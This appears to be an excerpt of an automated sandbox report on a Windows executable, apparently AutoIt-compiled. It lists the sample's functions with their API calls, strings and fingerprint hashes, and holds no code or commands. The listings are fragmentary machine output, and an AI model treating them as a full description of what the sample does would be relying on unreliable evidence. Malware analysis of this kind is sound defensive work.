                                                                                • Instruction ID: 528b9868fcfce7d314f2f73caeecc6089c0fa47b43970ddcd1658cd380c8b7b4
                                                                                • Opcode Fuzzy Hash: fe1cc8e53873b9b74c5756c91ffdd992c806ac3fb195192fa1c94940ec98058c
                                                                                • Instruction Fuzzy Hash: F71190712002197FEF219F54DC94EFB3BAFEB953A4F104129F91897390D6719E518760
                                                                                Function 00663710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 005D604C
                                                                                  • Part of subcall function 005D600E: GetStockObject.GDI32(00000011), ref: 005D6060
                                                                                  • Part of subcall function 005D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 005D606A
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0066377A
                                                                                • GetSysColor.USER32(00000012), ref: 00663794
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                • String ID: static
                                                                                • API String ID: 1983116058-2160076837
                                                                                • Opcode ID: ea26ca10ba81232b2822a47f5ad7b4362d59a25e3d5220030056a64cbff5e68d
                                                                                • Instruction ID: d5652f840495f702c57034211704e83441a272fa8c78566370237e7d57e377e2
                                                                                • Opcode Fuzzy Hash: ea26ca10ba81232b2822a47f5ad7b4362d59a25e3d5220030056a64cbff5e68d
                                                                                • Instruction Fuzzy Hash: 2C1159B261021AAFDB00DFA8CC45AFA7BB9FB09314F004515F956E2250E775E8519B50
                                                                                Function 0064CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0064CD7D
                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0064CDA6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$OpenOption
                                                                                • String ID: <local>
                                                                                • API String ID: 942729171-4266983199
                                                                                • Opcode ID: 43c76cc4c269167d8268ab0b6acf6b821e3e364df6c67a0981bc4274b3754015
                                                                                • Instruction ID: 282a98c129ebad29eb54a8f9b9b47b21b1ac18219b9857fe095b7ea02152346d
                                                                                • Opcode Fuzzy Hash: 43c76cc4c269167d8268ab0b6acf6b821e3e364df6c67a0981bc4274b3754015
                                                                                • Instruction Fuzzy Hash: D0110271A06631BAD7785B66CC48EF3BEAEEF527B4F00422AB10983280D3709841D6F0
                                                                                Function 00663429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 006634AB
                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006634BA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LengthMessageSendTextWindow
                                                                                • String ID: edit
                                                                                • API String ID: 2978978980-2167791130
                                                                                • Opcode ID: be62c57fd83bc365cff49d8ea6c6e2749b40804156551a890137cd5e9b5d96cc
                                                                                • Instruction ID: 4badd019862002f64fc0c124d44a377c546a52059c042e8e3aed698d1a17fb76
                                                                                • Opcode Fuzzy Hash: be62c57fd83bc365cff49d8ea6c6e2749b40804156551a890137cd5e9b5d96cc
                                                                                • Instruction Fuzzy Hash: DC119D71100118ABEB114E64DC44AFA77ABEB05374F504324F961933E0CB71EC919B50
                                                                                Function 00636C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • CharUpperBuffW.USER32(?,?,?), ref: 00636CB6
                                                                                • _wcslen.LIBCMT ref: 00636CC2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                • String ID: STOP
                                                                                • API String ID: 1256254125-2411985666
                                                                                • Opcode ID: 60827625fc5ce4d568006642b890c113afff7290c73968857254e25ac5c4ff2f
                                                                                • Instruction ID: 8992c3be68ae3c92b570fdcce7aa707b6141bad56d68b93a2485bdcf04312cce
                                                                                • Opcode Fuzzy Hash: 60827625fc5ce4d568006642b890c113afff7290c73968857254e25ac5c4ff2f
                                                                                • Instruction Fuzzy Hash: 4D010432600527AACB209FBDDC858FF77BAFFA1714F004529F85296291EA31D800C790
                                                                                Function 00631BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                  • Part of subcall function 00633CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00633CCA
                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00631C46
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 624084870-1403004172
                                                                                • Opcode ID: 2c8b3cf22b8a5460721a1fca4293a21e6f0651b6f5e36d83ae8f81093af277ea
                                                                                • Instruction ID: 1961109c5bedb3dea7ea28458cec41e778ea51edee17408fb4c661109b179106
                                                                                • Opcode Fuzzy Hash: 2c8b3cf22b8a5460721a1fca4293a21e6f0651b6f5e36d83ae8f81093af277ea
                                                                                • Instruction Fuzzy Hash: CD01F77178010566CF14EBA4CA559FF77AAAB52340F10102BB40667381EA249E0887F1
                                                                                Function 00631C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                  • Part of subcall function 00633CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00633CCA
                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00631CC8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 624084870-1403004172
                                                                                • Opcode ID: e9d358f3000c5afcfa897d15648ef5416b25712c8c2a8fdf00b7fcc311a95382
                                                                                • Instruction ID: 516e0aaf9cc7e1862db2cf410709ef169521a6159b253cc7cb801d10e11d935b
                                                                                • Opcode Fuzzy Hash: e9d358f3000c5afcfa897d15648ef5416b25712c8c2a8fdf00b7fcc311a95382
                                                                                • Instruction Fuzzy Hash: 4401D671B8011967CF14EBA4CA15AFE77AEAF12340F14101BB80277381EA649F09D6B2
                                                                                Function 005EA4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 005EA529
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer_wcslen
                                                                                • String ID: ,%j$3yb
                                                                                • API String ID: 2551934079-1169086100
                                                                                • Opcode ID: 7c760608c29de3e5327003438b899d17a34b3a73c3e464a2ae7af045badacc57
                                                                                • Instruction ID: 163e2fdfe1d5de04a6a08b2b408b9388cfeeb92e0577b802fb2c22407e144afd
                                                                                • Opcode Fuzzy Hash: 7c760608c29de3e5327003438b899d17a34b3a73c3e464a2ae7af045badacc57
                                                                                • Instruction Fuzzy Hash: 8B014731B4066687CA18F77DE85FAAC3F55BB86710F441466F541172C3DE107D018A97
                                                                                Function 00668172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006A3018,006A305C), ref: 006681BF
                                                                                • CloseHandle.KERNEL32 ref: 006681D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID: \0j
                                                                                • API String ID: 3712363035-3905335411
                                                                                • Opcode ID: 5a2eff4a058567355ffa18e604622c7230494b1782fb29b85c49e41078b4948e
                                                                                • Instruction ID: 64e74cf36d77c5b293ca81b1626b7c7f7df2945441ad60e42fd7d0498ceeeb15
                                                                                • Opcode Fuzzy Hash: 5a2eff4a058567355ffa18e604622c7230494b1782fb29b85c49e41078b4948e
                                                                                • Instruction Fuzzy Hash: A5F054F1640314BEE3107B656C45FB77E5EEB06754F005421FB08D52A1D6799E008BB4
                                                                                Function 0065747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: 3, 3, 16, 1
                                                                                • API String ID: 176396367-3042988571
                                                                                • Opcode ID: 249695010ce50864fcb3acae5970f5e486d1447f6c4a61c4cce53486b361105c
                                                                                • Instruction ID: af1e9f6c6461ea562d2edbbb0662c2093a052d1ed41dfab013f3552b604645ff
                                                                                • Opcode Fuzzy Hash: 249695010ce50864fcb3acae5970f5e486d1447f6c4a61c4cce53486b361105c
                                                                                • Instruction Fuzzy Hash: 36E02B023142211093311279FDC59BF5ACFDFC5752B14182FFE85C2366EAD88D9593A0
                                                                                Function 00630B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00630B23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                • API String ID: 2030045667-4017498283
                                                                                • Opcode ID: 2b26c67de17b634a00261f161f7f2d9cab4fcca4016161aefc2438897ecb00f3
                                                                                • Instruction ID: 8b9b753d83a1a5711c8873ef792abdfe3540a690aa058e97f43baaa83e83f993
                                                                                • Opcode Fuzzy Hash: 2b26c67de17b634a00261f161f7f2d9cab4fcca4016161aefc2438897ecb00f3
                                                                                • Instruction Fuzzy Hash: 8FE0D83124474926D31437557C07F997E899F05B20F100427F7C8955C38ED2645007E9
                                                                                Function 005F0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005EF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,005F0D71,?,?,?,005D100A), ref: 005EF7CE
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,005D100A), ref: 005F0D75
                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,005D100A), ref: 005F0D84
                                                                                Strings
                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 005F0D7F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                • API String ID: 55579361-631824599
                                                                                • Opcode ID: 990600f77073500f70ab834aa79962b1c31000115910898e97a086a3885ffa64
                                                                                • Instruction ID: e03c2c46f0d8dc6b71d08411ae632ebbb66aa76ea423d81297cc3b7610f6bedf
                                                                                • Opcode Fuzzy Hash: 990600f77073500f70ab834aa79962b1c31000115910898e97a086a3885ffa64
                                                                                • Instruction Fuzzy Hash: C7E06D742007518BD7309FBCE4083667FE6BB04744F04992EE982C6692EBB6E4448B91
                                                                                Function 005EE398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 005EE3D5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: 0%j$8%j
                                                                                • API String ID: 1385522511-4048573861
                                                                                • Opcode ID: 2b218949b600adb177a07ac321b1717ad6f724781c7b95d1c915623ebe030ff8
                                                                                • Instruction ID: ff4221804de93a5cb59658d27f7acd750bae99986a337a5efbeac198952448c4
                                                                                • Opcode Fuzzy Hash: 2b218949b600adb177a07ac321b1717ad6f724781c7b95d1c915623ebe030ff8
                                                                                • Instruction Fuzzy Hash: 47E02635CA0956CBC70CBB1DF87AA98BB93BB4E320B102965E142875D29B343C418E54
                                                                                Function 0062D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID: %.3d$X64
                                                                                • API String ID: 481472006-1077770165
                                                                                • Opcode ID: e886ce776387450fb963685b7694386224ec380c92d5bf8df137de9bf28950a1
                                                                                • Instruction ID: bdd9836331a5055bd8946272a744a67592491019d08795661557d15a2432d020
                                                                                • Opcode Fuzzy Hash: e886ce776387450fb963685b7694386224ec380c92d5bf8df137de9bf28950a1
                                                                                • Instruction Fuzzy Hash: 6AD0127180A529E9CB5097E0EC498B9B77DBB18301F608452FE4691040E624C709AF61
                                                                                Function 00662356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0066236C
                                                                                • PostMessageW.USER32(00000000), ref: 00662373
                                                                                  • Part of subcall function 0063E97B: Sleep.KERNEL32 ref: 0063E9F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: b860539ec58df242b55be1acf29e49c25fcfe8e3249e717da82a6c3639850e78
                                                                                • Instruction ID: 473631f5830b7befdf90c23d1ff26fad91bdaa7d6fc83fe90b27dd9b90f0a77b
                                                                                • Opcode Fuzzy Hash: b860539ec58df242b55be1acf29e49c25fcfe8e3249e717da82a6c3639850e78
                                                                                • Instruction Fuzzy Hash: 6DD0C9323817507AEAA4B770EC0FFD66A1A9B04B20F015916B686EA1D0C9E0A8018A58
                                                                                Function 00662322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0066232C
                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0066233F
                                                                                  • Part of subcall function 0063E97B: Sleep.KERNEL32 ref: 0063E9F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: 4cfa5f9f071c49f509e87e9e25ec398a85a15dc0ec411adce4b79ae29d81851d
                                                                                • Instruction ID: af32c21afc9ace9d2fc1eb65a6f68437cd72d7111c4486f496dceaad0123d765
                                                                                • Opcode Fuzzy Hash: 4cfa5f9f071c49f509e87e9e25ec398a85a15dc0ec411adce4b79ae29d81851d
                                                                                • Instruction Fuzzy Hash: 73D01236394750B7EBA4B770EC0FFD67A1A9B04B20F015916B786EA1D0C9F0A801CB58